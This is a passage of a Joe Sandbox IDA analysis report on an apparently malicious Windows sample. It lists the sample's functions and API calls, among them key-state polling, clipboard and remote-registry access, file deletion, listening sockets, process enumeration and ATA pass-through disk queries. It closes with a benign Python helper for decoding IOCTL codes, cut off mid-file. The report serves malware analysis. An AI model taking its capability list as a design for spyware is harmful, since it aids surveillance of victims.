                                    • Opcode Fuzzy Hash: 9bee42c56c271632b5aa702aaaeb583aaa09b27ab6ce871ddc447ba6a8a36604
                                    • Instruction Fuzzy Hash: 85616C71900209EFDF00DFA4DC84AEEBBB9FF04751F148169F915A7291DB359A0AEB60
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                    • API String ID: 0-4052911093
                                    • Opcode ID: 93ba877877d1dc93ce5debb36ea973a52736b4e51138eb079ad8adfd0a398b46
                                    • Instruction ID: 61500298e49a56824797ad4d8f997f6c1059b6c603be2411866f03ce055214ee
                                    • Opcode Fuzzy Hash: 93ba877877d1dc93ce5debb36ea973a52736b4e51138eb079ad8adfd0a398b46
                                    • Instruction Fuzzy Hash: 7A729171E002199BDB24CF59D8807EEB7B5FF48321F14816AE945EB280EB749D85EF90
                                    APIs
                                      • Part of subcall function 00F810A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F80038,?,?), ref: 00F810BC
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F80737
                                      • Part of subcall function 00F09997: __itow.LIBCMT ref: 00F099C2
                                      • Part of subcall function 00F09997: __swprintf.LIBCMT ref: 00F09A0C
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F807D6
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F8086E
                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F80AAD
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F80ABA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                    • String ID:
                                    • API String ID: 1240663315-0
                                    • Opcode ID: e791b9de43456374a6ba77d30f9ecda3178bc12db2f651cb9f8a8402dfb17392
                                    • Instruction ID: 414c6f99b2ee0ff46649c82168352ffe3159aca76d6e5d5c6da30f0e479afc7d
                                    • Opcode Fuzzy Hash: e791b9de43456374a6ba77d30f9ecda3178bc12db2f651cb9f8a8402dfb17392
                                    • Instruction Fuzzy Hash: CAE14F31604310AFCB14EF28CC95E6ABBE4FF89714B04856DF859DB2A2DB34E905EB51
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 00F60241
                                    • GetAsyncKeyState.USER32(000000A0), ref: 00F602C2
                                    • GetKeyState.USER32(000000A0), ref: 00F602DD
                                    • GetAsyncKeyState.USER32(000000A1), ref: 00F602F7
                                    • GetKeyState.USER32(000000A1), ref: 00F6030C
                                    • GetAsyncKeyState.USER32(00000011), ref: 00F60324
                                    • GetKeyState.USER32(00000011), ref: 00F60336
                                    • GetAsyncKeyState.USER32(00000012), ref: 00F6034E
                                    • GetKeyState.USER32(00000012), ref: 00F60360
                                    • GetAsyncKeyState.USER32(0000005B), ref: 00F60378
                                    • GetKeyState.USER32(0000005B), ref: 00F6038A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: State$Async$Keyboard
                                    • String ID:
                                    • API String ID: 541375521-0
                                    • Opcode ID: 6b3dd9e58a2e09e55cc2c2b2c47ec428362b92945bd6f639efd13b57c2b46cb3
                                    • Instruction ID: 175b43c13efed516760dc7566d29c2ce7b5d371b1e435bc3abaff4e5eaca63d4
                                    • Opcode Fuzzy Hash: 6b3dd9e58a2e09e55cc2c2b2c47ec428362b92945bd6f639efd13b57c2b46cb3
                                    • Instruction Fuzzy Hash: 7741CB34D047C96EFF314A6488193F7BEA0AF12361F28409DD5C5466C2EF945DC8A792
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                    • String ID:
                                    • API String ID: 1737998785-0
                                    • Opcode ID: 6f8c9c1aac370d2c75b74b3e637eea4deb720c61233441b85afb1011cafbb92b
                                    • Instruction ID: 20fee2fab0f5f920033bee8d3c93669f4fb720ea59005214e95fcebe5a6191b8
                                    • Opcode Fuzzy Hash: 6f8c9c1aac370d2c75b74b3e637eea4deb720c61233441b85afb1011cafbb92b
                                    • Instruction Fuzzy Hash: 6B2181357002149FDB10AF64EC09BB977A8EF04725F14C02AF94ADB2A2DB78AD05FB55
                                    APIs
                                      • Part of subcall function 00F048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F048A1,?,?,00F037C0,?), ref: 00F048CE
                                      • Part of subcall function 00F64CD3: GetFileAttributesW.KERNEL32(?,00F63947), ref: 00F64CD4
                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F63ADF
                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00F63B87
                                    • MoveFileW.KERNEL32(?,?), ref: 00F63B9A
                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00F63BB7
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F63BD9
                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00F63BF5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                    • String ID: \*.*
                                    • API String ID: 4002782344-1173974218
                                    • Opcode ID: bcd56f8fa9b158174bff56f6ce49784f11364ace1bdf20dbb8675e5f534d5f51
                                    • Instruction ID: 69793cad1431536a741e49c872588734f3a94f4c96ce6eb4b4c80079e1a53641
                                    • Opcode Fuzzy Hash: bcd56f8fa9b158174bff56f6ce49784f11364ace1bdf20dbb8675e5f534d5f51
                                    • Instruction Fuzzy Hash: 17515F31D0124D9ACF15EBA0CD929EDB7B8AF54300F6441A9E44277091DF296F09FBA0
                                    APIs
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00F6F6AB
                                    • Sleep.KERNEL32(0000000A), ref: 00F6F6DB
                                    • _wcscmp.LIBCMT ref: 00F6F6EF
                                    • _wcscmp.LIBCMT ref: 00F6F70A
                                    • FindNextFileW.KERNEL32(?,?), ref: 00F6F7A8
                                    • FindClose.KERNEL32(00000000), ref: 00F6F7BE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                    • String ID: *.*
                                    • API String ID: 713712311-438819550
                                    • Opcode ID: 954290e3ea48d716ec6f9c6d5bfe7741da48e866be97c1b1a77bad7adc11f6ce
                                    • Instruction ID: 7e61ad45dee375ffce327e578a94555e19becc6ebc18d906cbd188dfa2f438b5
                                    • Opcode Fuzzy Hash: 954290e3ea48d716ec6f9c6d5bfe7741da48e866be97c1b1a77bad7adc11f6ce
                                    • Instruction Fuzzy Hash: 15417F71D0021E9FCF11DF64DC85AEEBBB4FF05310F144566E815A21A1DB34AE88EB90
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • GetSystemMetrics.USER32(0000000F), ref: 00F8D78A
                                    • GetSystemMetrics.USER32(0000000F), ref: 00F8D7AA
                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00F8D9E5
                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F8DA03
                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F8DA24
                                    • ShowWindow.USER32(00000003,00000000), ref: 00F8DA43
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00F8DA68
                                    • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 00F8DA8B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                                    • String ID:
                                    • API String ID: 830902736-0
                                    • Opcode ID: 9b8dcee2fe3069b48cec156671f2fdac628d6a7cacbfd0d6388cbb7c8cd7bb5b
                                    • Instruction ID: b24825f187309333884aef2176cbd103911fffef5b787b64d43cf7ed5524a7e8
                                    • Opcode Fuzzy Hash: 9b8dcee2fe3069b48cec156671f2fdac628d6a7cacbfd0d6388cbb7c8cd7bb5b
                                    • Instruction Fuzzy Hash: 7AB19A71A00219EFDF18DF68C9857FD7BB1BF44710F188069EC48AB296D734A950EB50
                                    Strings
                                    Similarity
                                    • API ID:
                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                    • API String ID: 0-1546025612
                                    • Opcode ID: 970adadae420ca6afae562b7fa05fff0bce5fb76e5a569a6557515345e166e76
                                    • Instruction ID: beeb4daaf0429a8d70f48a8bd9ae39dea0361cd76bbdd0d111a58638353deccf
                                    • Opcode Fuzzy Hash: 970adadae420ca6afae562b7fa05fff0bce5fb76e5a569a6557515345e166e76
                                    • Instruction Fuzzy Hash: A4A29F75E0421ACBDF24DF58C9907EDB7B1BF94324F2481AAD856A7280D734AEC1EB50
                                    APIs
                                    Similarity
                                    • API ID: _memmove
                                    • String ID:
                                    • API String ID: 4104443479-0
                                    • Opcode ID: 4d774c4dea18f7fa4688114a1b20ee6003087779ade742c7385e729638ba741d
                                    • Instruction ID: a34d0e9048dc1626c3ede85e3f48d12c8c7bb5e176b67a4aa04359f85f62cef5
                                    • Opcode Fuzzy Hash: 4d774c4dea18f7fa4688114a1b20ee6003087779ade742c7385e729638ba741d
                                    • Instruction Fuzzy Hash: 89129E70A00609DFDF14DFA4D981AEEB7B5FF88300F104669E806E7291EB39AD55EB50
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                      • Part of subcall function 00F02344: GetCursorPos.USER32(?), ref: 00F02357
                                      • Part of subcall function 00F02344: ScreenToClient.USER32(00FC67B0,?), ref: 00F02374
                                      • Part of subcall function 00F02344: GetAsyncKeyState.USER32(00000001), ref: 00F02399
                                      • Part of subcall function 00F02344: GetAsyncKeyState.USER32(00000002), ref: 00F023A7
                                    • ReleaseCapture.USER32 ref: 00F8C2F0
                                    • SetWindowTextW.USER32(?,00000000), ref: 00F8C39A
                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00F8C3AD
                                    • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?), ref: 00F8C48F
                                    Strings
                                    Similarity
                                    • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                    • API String ID: 973565025-2107944366
                                    • Opcode ID: 6d6f63f97a2eae8edc25071ee10b7d22347cc7c25563bff5a2ee7e4a864f3c06
                                    • Instruction ID: e89724ec2523b47ddb5c186b840350350b71f132a65394ce936be6debf46525c
                                    • Opcode Fuzzy Hash: 6d6f63f97a2eae8edc25071ee10b7d22347cc7c25563bff5a2ee7e4a864f3c06
                                    • Instruction Fuzzy Hash: 6351AE70608309AFD700EF14CC56FAA7BE0EF88314F00451DF5918B2E1DB75A949EB62
                                    APIs
                                      • Part of subcall function 00F58CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F58D0D
                                      • Part of subcall function 00F58CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F58D3A
                                      • Part of subcall function 00F58CC3: GetLastError.KERNEL32 ref: 00F58D47
                                    • ExitWindowsEx.USER32(?,00000000), ref: 00F6549B
                                    Strings
                                    Similarity
                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                    • String ID: $@$SeShutdownPrivilege
                                    • API String ID: 2234035333-194228
                                    • Opcode ID: 95030dea2ca2bfbaf6e2d0bad5709a8ada3dfddf411f830f3ee6a6e169cedf8c
                                    • Instruction ID: 1e9f134feae129d7a1268869ef645096f133529bf3ca5ac5e84e9f541858b7a1
                                    • Opcode Fuzzy Hash: 95030dea2ca2bfbaf6e2d0bad5709a8ada3dfddf411f830f3ee6a6e169cedf8c
                                    • Instruction Fuzzy Hash: 3B014C71B54A051EE728D374EC6ABB67258EB04BA3F3402A1FD06F60C2DE554C847290
                                    APIs
                                    • socket.WS2_32(00000002,00000001,00000006), ref: 00F765EF
                                    • WSAGetLastError.WS2_32(00000000), ref: 00F765FE
                                    • bind.WS2_32(00000000,?,00000010), ref: 00F7661A
                                    • listen.WS2_32(00000000,00000005), ref: 00F76629
                                    • WSAGetLastError.WS2_32(00000000), ref: 00F76643
                                    • closesocket.WS2_32(00000000), ref: 00F76657
                                    Similarity
                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                    • String ID:
                                    • API String ID: 1279440585-0
                                    • Opcode ID: e1f98ce893422d8c033e1323a567e03ae25a53103b47a559ea95d5f53749b8d0
                                    • Instruction ID: a673c138ef8912f3cdcb1f6ba87f39b0e94d961e7bb629aa65d8cd63ea9d710e
                                    • Opcode Fuzzy Hash: e1f98ce893422d8c033e1323a567e03ae25a53103b47a559ea95d5f53749b8d0
                                    • Instruction Fuzzy Hash: 12219E316006049FDB10AF64CC49B7EB7A9EF48320F14815AE95AEB2D2DB74AD05BB52
                                    APIs
                                      • Part of subcall function 00F20FF6: std::exception::exception.LIBCMT ref: 00F2102C
                                      • Part of subcall function 00F20FF6: __CxxThrowException@8.LIBCMT ref: 00F21041
                                    • _memmove.LIBCMT ref: 00F5062F
                                    • _memmove.LIBCMT ref: 00F50744
                                    • _memmove.LIBCMT ref: 00F507EB
                                    Similarity
                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                    • String ID:
                                    • API String ID: 1300846289-0
                                    • Opcode ID: 835bfb421f31ddc92154905ab73aacda9501bd7c9ecc72e0a63b8197532107c8
                                    • Instruction ID: 04e58c6ad1700bec80118b71cd467004e28cdbde889daaf39f1fb3c5b91f0c8c
                                    • Opcode Fuzzy Hash: 835bfb421f31ddc92154905ab73aacda9501bd7c9ecc72e0a63b8197532107c8
                                    • Instruction Fuzzy Hash: CA02B2B1E00209DFCF04DF64D981AAEBBB5FF84310F1480A9E806DB295EB35D955EB91
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00F019FA
                                    • GetSysColor.USER32(0000000F), ref: 00F01A4E
                                    • SetBkColor.GDI32(?,00000000), ref: 00F01A61
                                      • Part of subcall function 00F01290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00F012D8
                                    Similarity
                                    • API ID: ColorDialogNtdllProc_$LongWindow
                                    • String ID:
                                    • API String ID: 591255283-0
                                    • Opcode ID: 3dd9ab367b8cec38903c3c98f5e649b307a6c5217c915016a61420df66eab6db
                                    • Instruction ID: 5aedd16890a722c4eb1864de66af0cd80153505e9f6bd89dcecadadc4d642338
                                    • Opcode Fuzzy Hash: 3dd9ab367b8cec38903c3c98f5e649b307a6c5217c915016a61420df66eab6db
                                    • Instruction Fuzzy Hash: 6FA13772605549BAEA39ABA94C69FBF369CFF813A1F140119F502D61D2CE2D8D01B3B1
                                    APIs
                                      • Part of subcall function 00F780A0: inet_addr.WS2_32(00000000), ref: 00F780CB
                                    • socket.WS2_32(00000002,00000002,00000011), ref: 00F76AB1
                                    • WSAGetLastError.WS2_32(00000000), ref: 00F76ADA
                                    • bind.WS2_32(00000000,?,00000010), ref: 00F76B13
                                    • WSAGetLastError.WS2_32(00000000), ref: 00F76B20
                                    • closesocket.WS2_32(00000000), ref: 00F76B34
                                    Similarity
                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                    • String ID:
                                    • API String ID: 99427753-0
                                    • Opcode ID: c45e619400484059efe43fa9c2e9d8b926c1a88dd02d478f9a2774ea0b2b2571
                                    • Instruction ID: 3e9fb5556491ebd4f5d94f21fa7b2ddf4facf275e7c44cbf5fc2334ca6539973
                                    • Opcode Fuzzy Hash: c45e619400484059efe43fa9c2e9d8b926c1a88dd02d478f9a2774ea0b2b2571
                                    • Instruction Fuzzy Hash: D941D275B00614AFEB10AF68DC86F7E77A8DB44720F048059F95AEB2C3DA789D01B791
                                    APIs
                                    Similarity
                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                    • String ID:
                                    • API String ID: 292994002-0
                                    • Opcode ID: af97a5ce7e711a81689d4bb9314ecd8cf22be672a0f90ef264e4d02381ec2895
                                    • Instruction ID: eac245e906c0eeb1fe0250de56f3de026ce4a38020f99661a2f57ce82524ce0e
                                    • Opcode Fuzzy Hash: af97a5ce7e711a81689d4bb9314ecd8cf22be672a0f90ef264e4d02381ec2895
                                    • Instruction Fuzzy Hash: 8411C4327009156FE7212F26DC44BAFBB99EF44B31B844039F806D7241EB749901ABA4
                                    Similarity
                                    • API ID: __itow__swprintf
                                    • String ID:
                                    • API String ID: 674341424-0
                                    • Opcode ID: c23d4b87660cdb228cc123c089058f19939799820601fa10158000d83318811c
                                    • Instruction ID: 6dd03472000c850f78ed7a99c70fa5e0acfe0b35ca71f554544a8c67b6d1d6c2
                                    • Opcode Fuzzy Hash: c23d4b87660cdb228cc123c089058f19939799820601fa10158000d83318811c
                                    • Instruction Fuzzy Hash: 8E22CF716083019FC724EF24C881BAFB7E5BF84710F14491DF89697292EB75EA44EB92
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00F7F151
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00F7F15F
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                    • Process32NextW.KERNEL32(00000000,?), ref: 00F7F21F
                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00F7F22E
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                    • String ID:
                                    • API String ID: 2576544623-0
                                    • Opcode ID: 109c73316b52d157505c0f94b3e6db35ecbed45fc0dcff708f3a140fd4ff8b83
                                    • Instruction ID: 80b02f02a05970c2a8aae8cbbf68dcd6f44978521f0f23d7bba28bbb1b56727e
                                    • Opcode Fuzzy Hash: 109c73316b52d157505c0f94b3e6db35ecbed45fc0dcff708f3a140fd4ff8b83
                                    • Instruction Fuzzy Hash: 4A518171508701AFD310EF24DC85E6BB7E8FF98750F50482DF49597292EB74A908EB92
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • GetCursorPos.USER32(?), ref: 00F8C7C2
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F3BBFB,?,?,?,?,?), ref: 00F8C7D7
                                    • GetCursorPos.USER32(?), ref: 00F8C824
                                    • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F3BBFB,?,?,?), ref: 00F8C85E
                                    Similarity
                                    • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                    • String ID:
                                    • API String ID: 1423138444-0
                                    • Opcode ID: a34f091fab895ab50a8b199d45067a14748aea5a369e61dc4170ff7c13416807
                                    • Instruction ID: cdd4149f241f132db944b46b9d4bbfbf71f6424a8f501c7c441193b8dc7ee7fa
                                    • Opcode Fuzzy Hash: a34f091fab895ab50a8b199d45067a14748aea5a369e61dc4170ff7c13416807
                                    • Instruction Fuzzy Hash: 8D315C35A00018AFCB25DF58C899EFA7BBAEF49720F444169F9058B2A1C7359D50FBA0
                                    APIs
                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00F640D1
                                    • _memset.LIBCMT ref: 00F640F2
                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00F64144
                                    • CloseHandle.KERNEL32(00000000), ref: 00F6414D
                                    Similarity
                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                    • String ID:
                                    • API String ID: 1157408455-0
                                    • Opcode ID: 9b5b7f670f47db4e4e85eb80a23c976a620ec67bbc893971bed0c1d58a51224f
                                    • Instruction ID: a1d76a47c2e1fdd030f04f46f63ca8f711205386aa9bd1d25ad51ca2b9bd64be
                                    • Opcode Fuzzy Hash: 9b5b7f670f47db4e4e85eb80a23c976a620ec67bbc893971bed0c1d58a51224f
                                    • Instruction Fuzzy Hash: DD11E775D0122C7AD730ABA5AC4DFEBBB7CEF44760F1042AAF908D7180D6744E849BA4
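The function above opens a handle with GENERIC_READ | GENERIC_WRITE (0xC0000000), full sharing (3), OPEN_EXISTING (3) and FILE_ATTRIBUTE_NORMAL (0x80), then issues DeviceIoControl with control code 0x0004D02C and 0x200-byte input and output buffers. Splitting that code into its CTL_CODE fields gives device type 4 (FILE_DEVICE_CONTROLLER, the SCSI base), function 0x40B, METHOD_BUFFERED and read/write access, which is IOCTL_ATA_PASS_THROUGH; the 512-byte buffers are consistent with an ATA_PASS_THROUGH_EX header followed by a 512-byte data area, the size of an IDENTIFY DEVICE response (the raw path to a disk's model and serial number). The path argument is not visible in the trace, so which device is opened is not established by the report. The decoder below is an added example for reading such arguments; it is not part of the Joe Sandbox output, and the constant names are those of the Windows SDK headers.

```python
"""Decode a Windows I/O control code into its CTL_CODE fields.

Added example for reading DeviceIoControl arguments out of a sandbox
report; it is not part of the Joe Sandbox output. Field layout and the
constant names are those of the Windows SDK (winioctl.h, ntddscsi.h).
"""

# CTL_CODE(DeviceType, Function, Method, Access) =
#   (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
METHODS = {
    0: "METHOD_BUFFERED",
    1: "METHOD_IN_DIRECT",
    2: "METHOD_OUT_DIRECT",
    3: "METHOD_NEITHER",
}
ACCESS = {
    0: "FILE_ANY_ACCESS",
    1: "FILE_READ_ACCESS",
    2: "FILE_WRITE_ACCESS",
    3: "FILE_READ_ACCESS | FILE_WRITE_ACCESS",
}
# Device types an analyst meets often when a sample talks to storage.
DEVICE_TYPES = {
    0x04: "FILE_DEVICE_CONTROLLER (IOCTL_SCSI_BASE)",
    0x07: "FILE_DEVICE_DISK",
    0x09: "FILE_DEVICE_FILE_SYSTEM",
    0x1B: "FILE_DEVICE_SCSI",
    0x22: "FILE_DEVICE_UNKNOWN",
    0x2D: "FILE_DEVICE_MASS_STORAGE",
}
# Named codes as (device_type, function, method, access); the numeric value
# is derived through ctl_code() rather than hard-coded, so a typo shows up
# as a failed lookup instead of a wrong name.
KNOWN_IOCTLS = {
    "IOCTL_SCSI_PASS_THROUGH": (0x04, 0x0401, 0, 3),
    "IOCTL_SCSI_MINIPORT": (0x04, 0x0402, 0, 3),
    "IOCTL_SCSI_PASS_THROUGH_DIRECT": (0x04, 0x0405, 0, 3),
    "IOCTL_ATA_PASS_THROUGH": (0x04, 0x040B, 0, 3),
    "IOCTL_DISK_GET_DRIVE_GEOMETRY": (0x07, 0x0000, 0, 0),
    "IOCTL_STORAGE_QUERY_PROPERTY": (0x2D, 0x0500, 0, 0),
}


def ctl_code(device_type, function, method, access):
    """Compose a control code exactly as the CTL_CODE macro does."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


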